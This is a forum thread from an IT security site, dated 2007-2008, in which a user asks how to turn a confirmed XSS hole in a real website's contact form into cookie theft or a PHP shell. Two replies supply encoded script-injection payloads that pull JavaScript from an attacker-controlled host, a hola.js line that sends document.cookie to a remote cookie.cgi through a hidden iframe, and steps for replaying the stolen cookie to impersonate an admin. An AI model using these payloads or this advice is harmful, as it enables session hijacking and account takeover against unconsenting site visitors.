New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 231
Members: 0
Total: 231
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cross-site scripting aka XSS -> XSS on Forum - remote PHP shell or cookie.cgi questions
XSS on Forum - remote PHP shell or cookie.cgi questions
PostPosted: Thu Dec 20, 2007 1:27 am Reply with quote
onetwothree
Beginner
Beginner

I found a website that is vulnerable to and XSS attack via a contact forum. I am able to post the following popup;

[img]>"><ScRiPt%20%0a%0d>alert(1379844939)%3B</ScRiPt>.[/img]

Now I have found a cookie logging cgi script that is in place on "my server" but I am not sure how to encode the path to my remote cookie stealer as the encoding above

My questions are these:
1.What type of encoding is the script above?
2.Can I modify the above to call a php shell (c99), or to steal vistors cookies with my cookie.cgi script

thanks in advance for help pointing me in the right direction
PostPosted: Thu Dec 20, 2007 3:18 pm Reply with quote
waraxe
Site admin
Site admin

First of all, forget c99 shell in this stage of actions. You are going to steal the cookie, so ultimate goal right now is to have user plaintext password, password hash or session ID. And if you can use this information to impersonate the victim (usually admin), them maybe you can somehow reach to php shell level.
This specific target seems to have some input filtering in place, so it probably needs some testing and probing.
My suggestion is something like

Code:

[img]>"><ScRiPt%20%0a%0dsrc%3Dhttp%3A%2F%2Fmyhosting.com%2Fjs.js></ScRiPt>.[/img]

And then put javascript file to your hosting server and that js will do the cookie stealing by image url for example.
Re: XSS on Forum - remote PHP shell or cookie.cgi questions
PostPosted: Wed Mar 12, 2008 2:22 am Reply with quote
Oilik
Active user
Active user

onetwothree wrote:
I found a website that is vulnerable to and XSS attack via a contact forum. I am able to post the following popup;

[img]>"><ScRiPt%20%0a%0d>alert(1379844939)%3B</ScRiPt>.[/img]

Now I have found a cookie logging cgi script that is in place on "my server" but I am not sure how to encode the path to my remote cookie stealer as the encoding above

My questions are these:
1.What type of encoding is the script above?
2.Can I modify the above to call a php shell (c99), or to steal vistors cookies with my cookie.cgi script

thanks in advance for help pointing me in the right direction

Since this is only XSS, you can only put client-side scripting in there. You will need to steal a cookie[mm yummy].
I suggest doing:
Code:
[img]>"><script src=http://yoursite.com/hola.js>[/img]

And in hola.js on yoursite.com, put the following code:
Code:

document.write('<iframe src="http://yoursite.com/cookie.cgi?cookie=' + document.cookie + '" border="0" height="0px" width="0px"></iframe>');

Not the best way to do it, but gets the job done.

Then once you have the cookie[if you have firefox get AnEC, and just edit the values or add them, and ignore this]:
go to your browser and put:
Code:
javascript:void(document.cookie='cookie=here');
or something like that, I suggest 1 cookie at a time.
XSS on Forum - remote PHP shell or cookie.cgi questions
www.waraxe.us Forum Index -> Cross-site scripting aka XSS